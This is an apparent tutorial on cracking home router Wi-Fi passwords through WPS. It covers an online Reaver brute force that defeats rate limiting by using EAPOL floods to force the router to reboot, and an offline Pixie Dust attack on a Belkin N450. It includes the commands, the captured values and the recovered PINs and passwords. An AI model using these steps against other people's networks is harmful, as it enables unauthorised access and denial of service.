Showing 2 different methods to crack the passwords of routers by
taking advantage of WPS being enabled by default. 1st method is an
online attack using Reaver. Reaver wps brute forces the first half
of the pin and then the second half of the pin, meaning that the
entire key space for the WPS pin number can be exhausted in 11,000
attempts. Do to the ease of the attack, router manufacturers fought
this attack off by including rate limiting in the firmware. After
3-5 pin attempts that fail, the router locks the WPS function of
the router. The first attack exploits the fact that the router
unlocks the WPS if the router is forced to reboot. When this
occurs, pin cracking can continue to pursue the correct pin, and
ultimately the passphrase to the router.
We will be using Kali Linux at the OS for this attack.
A wireless card capable of packet injection must be used to
perform such wireless attacks successfully.
Alfa Awus036NHA
Wireless card must be put into monitor mode so we can scan for
networks that have WPS enabled. Interface mon0 will be enabled.
airmon-ng start wlan0
Using the wash i mon0 command. We tell Kali to scan for routers
in the area with WPS enabled. It will also tell us if the access
point has locked WPS. Physical address of the router as well as the
channel it resides on is also given, which is needed for
attacks.
Upon launching a pin cracking attempt with Reaver, the access
point in question locks us out of WPS. Using a script that starts
an EAPOL flood request when Reaver detects rate limiting, we can
automatically reboot the router with this Denial of service attack,
and let Reaver continue cracking pins. EAPOL is an authentication
protocol used in wireless networks.
Screenshot shows the attack defeating rate limit detection, and
continuing to crack pins.If the attacker receives a NACK message
after the M4 message then we know the 1st half of the pin generated
was incorrect and we should continue.
IMPORTANT TO NOTE: Using a modified version of Reaver we allow
ourselves to not just flood the access point from 1 interface in
monitor mode with EAPOL requests but 3. This allows even more
packets to be injected into the router making a forced reboot and
WPS unlock even more likely. Mac addresses are also spoofed
automatically to make this possible.
TRIPLE FLOOD.
WPS PIN INEVITABLY CRACKED AND WIFI PASSWORD DUMPED. No NACK
after the M4 message verified the 1st half of the pin was cracked.
It is important to note that the next 4 digits only need 3 digit
pin to be cracked as the final 8th digit is a checksum of the first
4. WPS PIN: 79550000 Password: VULNERABLEIt took around 4 hours. It
states 3 seconds because the original was lost screenshot was lost
and I already had the pin from the 4 hour crack session.
Second attack: Brute forcing the WPS pin offline. Broadcom eCos
chips use a Pseudo Random Number Generator that is as pseudo as the
name suggests. This tells us that it is possible to brute force the
actual state of the Pseudo Random Number Generator.
The following information is known by all WPS enabled
devices:-Pseudo Random Number Generator used to make the public
keys (g^AB mod p)-g is the generator, A and B are private numbers
of the Enrollee and Registrar respectively, and p is a prime
We first need 3 components that the router spits out via
wireshark during authentication. Please note that the registrar is
the actual access point, which is responsible for the keys, and the
Enrollee is always the device trying to authenticate with the
router. This is gathered in the M1 and M2 messages.-N1 Enrollee
Nonce-PKR Public Key (Registrar Nonce) (g^B mod p)-PKE Public Key
(Enrollee Nonce) (g^A mod p) modulus.
The 4th component needed is the Authkey which is generated from
the key derivation key aka KDK.
--__________________________________________________________________________________
The final component needed to brute force the pin offline are
the two hashes generated in the M3 message.
-E-Hash1= HMAC (E-S1, PSK1, PKE, PKR)-E-Hash2= HMAC (E-S2, PSK2,
PKE, PKR)
So we also need E-S1 and E-S2. Once we have that we can get the
hashes and see if they match the hash generated in the M3 message.
All we do is run through 11,000 combination offline. That is done
within seconds if not less than a second. PSK1 and PSK2 in the hash
equation above are the first half and second half of the router.
You can see if you plug the components in that we already know, how
easy it is to just rip through different pins till the hash matches
the original. Four pin spaces is 10,000 combinations in addition to
three pin spaces which is one thousand combinations. The original
point was to figure out how to get E-S1 and E-S2 though. Let us
start with the worst. Ralink chipsets dont even have a E-S1 and
E-S2, so they are set to zero. There is literally nothing to brute
force in that respect. Grabbing the enrollee key, the authkey, and
the enrollee nonce will reveal any routers pin and ultimate
password if it has this vulnerable chipset. Broadcom keeps its E-S1
and E-S2 a secret, therefore bruteforcing the state of the PRNG
will reveal them. Realtek chipsets set the enrollee nonce equals to
E-S1 and E-S2 if the exchange is made in under one second. We will
be taking advantage of a Belkin n450 with a Realtek chipset. Once
the information needed is extracted, it will be fed into the WPS
Pixie program and be brute forced to reveal the pin of the router.
That pin will be fed back into the Reaver program so we can attain
the actual Wi-Fi password.The vulnerable router: Belkin N450
We will fire up a modified Reaver attack on the router.
Remember, we need the information from the M1, M2, and M3 messages.
We will also fire up Wireshark to sniff packet on the mon0
interface. The modified version of Reaver we will use will dump the
auth key, the enrollee nonce, and enrollee key, and the two hashes.
Since we arent hacking a Ralink chipset router, we will also need
the registrar key. Only Wireshark can capture that information as
Reaver does not have it built in. The only thing to remember during
this process, is that when looking for the packet containing the
registrar key, that the enrollee nonce must match, or else the
wrong keys will be inputted into the Wi-Fi Pixie program.-i =
interface -b=routers physical address -c=channel -vv=verbose
mode
As seen in this screenshot, the M1, M2, and M3 messages are
exchanged successfully, allowing us to stop the attack after only
one pin attempt. The modified version of Reaver has dumped the auth
key, e-nonce, enrollee public key, and hashes as promised.
Wireshark has captured the M1 and M2 messages as promised so we can
extract the registrar key. Can also view the enrollee nonce and
enrollee public key via Wireshark if needed.
Open up a text editor and copy paste the auth key, the enrollee
nonce, enrollee public key, and hashes. Then go to Wireshark and
hit Ctrl + f. This open up the find packet menu. We will be
searching in the M2 message for the registrar public key as it is
the final piece of the puzzle. Select string, and packet details,
and type public key. This will look through the M2 message for the
registrar key. If the screenshot is examined closely, it can be
seen that I have already found and highlighted the enrollee nonce
and it matches the nonce found in Reaver. It is verified that the
right packet is being used and not one from a different pin
transaction.
Registrar public key located, and loaded into text editor. Info
ready to be moved into brute force tool.
WPS PixieProper information plugged in, and the WPS pin resolved
in less then a second. PSK1(the first half of the pi) and
PSK2(second half of pin) are enumerated. Pin :21407420
The last step is to plug the pin into Reaver. It will resolve
the passphrase to the wifi without fear of rate limiting. It should
take no longer than 5 seconds as the brunt of the attack took place
offline.
First, we will add the pin to the original Reaver line with
pin-21407420.
Password cracked: PWNEDROUTER